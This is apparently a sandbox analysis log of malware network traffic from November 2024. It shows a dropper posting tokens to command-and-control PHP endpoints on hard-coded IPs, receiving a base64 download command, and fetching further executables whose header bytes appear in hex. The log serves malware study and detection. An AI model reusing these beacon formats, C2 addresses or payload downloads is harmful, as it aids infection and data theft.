                                                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 34 31 63 65 33 30 33 38 39 30 36 61 36 63 35 65 39 63 33 34 64 37 39 64 31 32 64 65 32 34 63 66 64 32 63 65 35 63 30 63 62 62 65 63 34 63 32 63 65 31 64 63 36 61 63 62 63 32 66 34 64 64 35 31 37 66 34 63 34 39 35 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 45 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: ------IDHIEGIIIECAKEBFBAAEContent-Disposition: form-data; name="token"041ce3038906a6c5e9c34d79d12de24cfd2ce5c0cbbec4c2ce1dc6acbc2f4dd517f4c495------IDHIEGIIIECAKEBFBAAEContent-Disposition: form-data; name="message"ybncbhylepme------IDHIEGIIIECAKEBFBAAE--
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.277833939 CET271INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:21 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 68
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=86
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 79 4d 54 55 75 4d 54 45 7a 4c 6a 45 32 4c 32 31 70 62 6d 55 76 63 6d 46 75 5a 47 39 74 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 58 77 3d
                                                                                                                                                                                                                                                                                        Data Ascii: aHR0cDovLzE4NS4yMTUuMTEzLjE2L21pbmUvcmFuZG9tLmV4ZXwwfDB8U3RhcnR8NXw=
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:23.448895931 CET474OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----HJJEGIEHIJKKFIDHDGID
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Content-Length: 272
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 45 47 49 45 48 49 4a 4b 4b 46 49 44 48 44 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 34 31 63 65 33 30 33 38 39 30 36 61 36 63 35 65 39 63 33 34 64 37 39 64 31 32 64 65 32 34 63 66 64 32 63 65 35 63 30 63 62 62 65 63 34 63 32 63 65 31 64 63 36 61 63 62 63 32 66 34 64 64 35 31 37 66 34 63 34 39 35 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 47 49 45 48 49 4a 4b 4b 46 49 44 48 44 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 47 49 45 48 49 4a 4b 4b 46 49 44 48 44 47 49 44 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: ------HJJEGIEHIJKKFIDHDGIDContent-Disposition: form-data; name="token"041ce3038906a6c5e9c34d79d12de24cfd2ce5c0cbbec4c2ce1dc6acbc2f4dd517f4c495------HJJEGIEHIJKKFIDHDGIDContent-Disposition: form-data; name="message"wkkjqaiaxkhb------HJJEGIEHIJKKFIDHDGID--
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:24.383596897 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:23 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=85
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        2192.168.2.449762185.215.113.16807352C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.304591894 CET80OUTGET /mine/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.215.113.16
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.943154097 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:21 GMT
                                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                        Content-Length: 3183104
                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 11 Nov 2024 15:34:17 GMT
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        ETag: "673223f9-309200"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 a0 30 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVf0@0/1@Wk0\0 @.rsrc@.idata @abdubcdx))@ajsqmvlu0l0@.taggant00"p0@
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.943171978 CET112INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.943495989 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.943541050 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.943555117 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.943634033 CET1236INData Raw: 28 63 af 90 1f e0 ae b8 da e0 d3 6d 26 49 63 10 ae a3 6a b8 3a 93 76 f2 73 cf bc 0a 71 27 37 a8 28 63 af 90 ff e0 ae b8 da e0 d3 6d 26 49 93 10 ee a3 6a b8 3a bb 76 f2 73 cf dc 0a 71 27 37 08 27 63 af 90 df e0 ae b8 da e0 d3 6d 26 49 93 10 1e a3
                                                                                                                                                                                                                                                                                        Data Ascii: (cm&Icj:vsq'7(cm&Ij:vsq'7'cm&Ij:7esq'7h'cm&IGj:|sq'7'cm&Inj:es<q'7(&cm&Ij:xs\q'7&c_m&Ij:wzs|q'7&c?m&Ij
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.943653107 CET1236INData Raw: 3a 03 73 f2 73 cf 7c 11 71 27 37 e8 5a 63 af 90 3f e5 ae b8 da e0 d3 6d 26 49 ab 10 c2 ad 6a b8 3a fb 7e f2 73 cf 9c 11 71 27 37 48 59 63 af 90 1f e5 ae b8 da e0 d3 6d 26 49 93 10 fa ad 6a b8 3a d3 7e f2 73 cf bc 11 71 27 37 a8 59 63 af 90 ff e5
                                                                                                                                                                                                                                                                                        Data Ascii: :ss|q'7Zc?m&Ij:~sq'7HYcm&Ij:~sq'7Ycm&Ij:}sq'7Xcm&Ij:{qsq'7hXcm&Ij:[{sq'7Xcm&Ij:xs<q'7(Wcm&Ij:}s\q'7Wc_
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.943665028 CET1236INData Raw: da e0 d3 6d 26 49 7b 10 52 ae 6a b8 3a 13 7b f2 73 cf 5c 14 71 27 37 88 4b 63 af 90 5f 9e ae b8 da e0 d3 6d 26 49 93 10 9a a9 6a b8 3a 6b 7d f2 73 cf 7c 14 71 27 37 e8 4b 63 af 90 3f 9e ae b8 da e0 d3 6d 26 49 5f 10 8a a9 6a b8 3a 4b 73 f2 73 cf
                                                                                                                                                                                                                                                                                        Data Ascii: m&I{Rj:{s\q'7Kc_m&Ij:k}s|q'7Kc?m&I_j:Kssq'7HJcm&Ioj:gesq'7Jcm&I.j:#{sq'7Icm&I^j:[~sq'7hIcm&IRj:ssq'7Icm&Ijj:|s<
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.943677902 CET1236INData Raw: 3e 26 af e1 30 49 a9 10 5e 70 55 b8 4b 68 0a b9 73 4f f9 80 ae 27 b7 b5 3e 26 af 37 2e 2b e8 11 34 dc 6b b8 4b dd fb b6 73 7e e8 7e 6e 73 55 b8 4b bf 0a b9 73 4f 83 80 ae 27 b7 99 3e 26 af e1 30 9e cf e2 ad 27 b7 37 0d 26 af 10 8c df 6b b8 4b e9
                                                                                                                                                                                                                                                                                        Data Ascii: >&0I^pUKhsO'>&7.+4kKs~~nsUKsO'>&0'7&kKs~kKs~p1o'FWzyU0q'mwO@s(w&m&m&r::M/p''K]Qss'M/|=jik'a}DKKsL7hk'rvc 7.+*>
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.943696022 CET1236INData Raw: e7 62 97 31 71 a8 6a ac ea 66 ab 2f 31 7a e9 b1 73 eb d3 6d 26 eb d3 6d 26 eb d3 6d 26 72 10 8c e7 62 97 2f dd 2b 16 a8 ea 6f ab 1d 30 2f af 6c 26 eb d3 6d 26 eb d3 6d 26 eb d3 6d 26 72 10 8c e7 26 12 e5 7b a0 b3 b1 dd 24 25 b0 a1 24 5e ac e8 52
                                                                                                                                                                                                                                                                                        Data Ascii: b1qjf/1zsm&m&m&rb/+o0/l&m&m&m&r&{$%$^R/#oVicmRHqEM/Mzsm&rfR/#`oR/lj,zs'm&m&p7N(tnrn3osO_1'KYr'p('xubwCs'/y"`
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.948090076 CET1236INData Raw: e8 ed 4d 1d 30 23 af 6c 26 4f 8b 32 ac 27 37 78 1f 66 af 10 9a ad 55 b8 4b c8 18 b9 73 a0 eb ad ee e7 9c 34 36 66 a8 b8 3b 03 15 f2 73 e0 d3 6d 26 eb d3 6d 26 eb d3 6d 26 72 10 8c e7 62 97 35 32 52 a9 1d 2f 77 b7 f1 1c 26 af 6c 26 eb d3 6d 26 eb
                                                                                                                                                                                                                                                                                        Data Ascii: M0#l&O2'7xfUKs46f;sm&m&m&rb52R/w&l&m&m&m&rYUw}+b)b-#{&^-3$mb4KlsRsls&E&/Mzsm&m&m&r$6@c'sw(j'xubjs'j:+bs'7


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        3192.168.2.449829185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.778376102 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:06.411161900 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:06 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        4192.168.2.449845185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:07.928489923 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 154
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:08.580842018 CET734INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:08 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 32 31 66 0d 0a 20 3c 63 3e 31 30 30 35 35 35 32 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 34 30 64 35 64 61 61 63 62 34 65 37 65 33 64 34 31 37 62 62 33 30 31 61 65 38 63 39 65 61 65 65 36 66 35 66 62 64 62 37 36 39 36 34 36 34 39 62 31 35 64 61 61 34 39 35 63 34 39 23 31 30 30 35 35 36 31 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 38 36 64 38 62 35 31 35 38 62 62 35 37 61 61 34 39 35 63 34 39 23 31 30 30 35 35 36 32 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 37 65 37 62 39 63 61 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 30 35 35 36 33 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 38 65 36 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: 21f <c>1005552001+++b5937c1a99d5f9d40d5daacb4e7e3d417bb301ae8c9eaee6f5fbdb76964649b15daa495c49#1005561001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc86d8b5158bb57aa495c49#1005562001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1005563001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1005564031+++b5937c1a99d5f9dd0246b5cb4f6522427fae1daa8e9eb4fff7b5c630804042ba5ce902415450#1005565001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#<d>0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        5192.168.2.44985187.120.125.254807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:08.589258909 CET55OUTGET /img/pidgeon.exe HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 87.120.125.254
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:09.174516916 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:09 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 11 Nov 2024 14:06:28 GMT
                                                                                                                                                                                                                                                                                        ETag: "10bc000-626a39b5eb7ef"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Content-Length: 17547264
                                                                                                                                                                                                                                                                                        Content-Type: application/x-msdownload
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 36 34 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 00 fd 31 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 d6 a5 00 00 e6 65 00 00 00 00 00 10 e4 a5 00 00 10 00 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 05 00 02 00 05 00 02 00 00 00 00 00 00 30 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZP@!L!This program must be run under Win64$7PEd1g"e@0@ SE8e-(.text `.data@.bss.idataST@.didata@.edata|@@.tls.rdatam~@@.reloc-.@B.pdata8ef@@.rsrcEE@
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:09.174544096 CET1236INData Raw: 40 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0e 01 00 00 00 00 00 c0 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 10 40 00 00 00 00 00 03 07 42 6f 6f 6c 65 61 6e
                                                                                                                                                                                                                                                                                        Data Ascii: @0@@@Boolean@FalseTrueSystem@@AnsiChar`@Char@ShortInt@SmallInt
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:09.174561977 CET1236INData Raw: 00 02 02 44 31 02 00 f8 10 40 00 00 00 00 00 04 00 00 00 00 00 00 00 02 02 44 32 02 00 f8 10 40 00 00 00 00 00 06 00 00 00 00 00 00 00 02 02 44 33 02 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 02 02 44 34 02 00 02 00 05 00 0b 60 62 41 00
                                                                                                                                                                                                                                                                                        Data Ascii: D1@D2@D3D4`bA&op_Equality@h@Lefth@RightbA&op_Inequality@h@Lefth@RightcAEmptyh@
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:09.174820900 CET1236INData Raw: 26 6f 70 5f 4c 65 73 73 54 68 61 6e 4f 72 45 71 75 61 6c 00 00 00 10 40 00 00 00 00 00 02 12 a8 17 40 00 00 00 00 00 04 4c 65 66 74 02 00 12 a8 17 40 00 00 00 00 00 05 52 69 67 68 74 02 00 02 00 70 1a 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii: &op_LessThanOrEqual@@Left@Rightp@%@p@2@`@p@`@P@@@@@@@p@@
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:09.174833059 CET1236INData Raw: 00 18 00 01 00 00 00 00 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 35 00 40 d3 40 00 00 00 00 00 09 43 6c 61 73 73 49 6e 66 6f 03 00 38 11 40 00 00 00 00 00 18 00 01 00 00 00 00 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 38 00 e0 cb 40
                                                                                                                                                                                                                                                                                        Data Ascii: Self5@@ClassInfo8@Self8@InstanceSize@SelfL @InheritsFrom@ Self@AClassK@MethodAddress8@
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:09.174846888 CET1236INData Raw: 00 11 53 61 66 65 43 61 6c 6c 45 78 63 65 70 74 69 6f 6e 03 00 28 14 40 00 00 00 00 00 28 00 03 08 c8 25 40 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 08 c8 25 40 00 00 00 00 00 00 00 0c 45 78 63 65 70 74 4f 62 6a 65 63 74 02 00 00 38 11 40 00 00
                                                                                                                                                                                                                                                                                        Data Ascii: SafeCallException(@(%@Self%@ExceptObject8@ExceptAddr=@AfterConstruction%@Self=@BeforeDestruction%@SelfI@Dispatch
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:09.174860001 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 0d 57 65 61 6b 41 74 74 72 69 62 75 74 65 00 00 00 00 08 28 40 00 00 00 00 00 07 0d 57 65 61 6b 41 74 74 72 69 62 75 74 65 e8 27 40 00 00 00 00 00 e0 26 40 00 00 00 00 00 00 00 06 53 79 73 74 65 6d 00 00 00 00 02
                                                                                                                                                                                                                                                                                        Data Ascii: WeakAttribute(@WeakAttribute'@&@System)@ )@)@)@&@`@p@`@P@@@@@@@
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:09.175360918 CET1236INData Raw: 00 a0 d3 40 00 00 00 00 00 b0 d3 40 00 00 00 00 00 80 d3 40 00 00 00 00 00 40 ca 40 00 00 00 00 00 70 ca 40 00 00 00 00 00 80 cc 40 00 00 00 00 00 90 ca 40 00 00 00 00 00 a0 ca 40 00 00 00 00 00 b0 ca 40 00 00 00 00 00 00 00 02 00 2e 2d 40 00 00
                                                                                                                                                                                                                                                                                        Data Ascii: @@@@@p@@@@@.-@Ds-@DHPPGENAttributeEp@Create(-@Selfp@ADataX@Create0-@Self@
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:09.175374985 CET1236INData Raw: 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 80 00 00 00 80 ff ff 08 52 65 66 43 6f 75 6e 74 00 00 00 00 00 00 78 32 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 33 40 00 00 00 00 00 78 32 40 00 00
                                                                                                                                                                                                                                                                                        Data Ascii: RefCountx2@3@x2@2@2@@`@p@`@P@@@@@@@p@@@@@
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:09.175388098 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 02 08 44 69 6d 43 6f 75 6e 74 02 00 f8 10 40 00 00 00 00 00 02 00 00 00 00 00 00 00 02 05 46 6c 61 67 73 02 00 b8 10 40 00 00 00 00 00 04 00 00 00 00 00 00 00 02 0b 45 6c 65 6d 65 6e 74 53 69 7a 65 02 00 b8 10 40 00 00
                                                                                                                                                                                                                                                                                        Data Ascii: DimCount@Flags@ElementSize@LockCount8@Data5@Bounds7@TVarRecord8@PRecord8@RecI
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:09.179677010 CET1236INData Raw: 74 07 74 6b 43 6c 61 73 73 08 74 6b 4d 65 74 68 6f 64 07 74 6b 57 43 68 61 72 09 74 6b 4c 53 74 72 69 6e 67 09 74 6b 57 53 74 72 69 6e 67 09 74 6b 56 61 72 69 61 6e 74 07 74 6b 41 72 72 61 79 08 74 6b 52 65 63 6f 72 64 0b 74 6b 49 6e 74 65 72 66
                                                                                                                                                                                                                                                                                        Data Ascii: ttkClasstkMethodtkWChartkLStringtkWStringtkVarianttkArraytkRecordtkInterfacetkInt64tkDynArraytkUStringtkClassReftkPointertkProcedureSystem;@TVarRec@VInteger@VBoolean


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
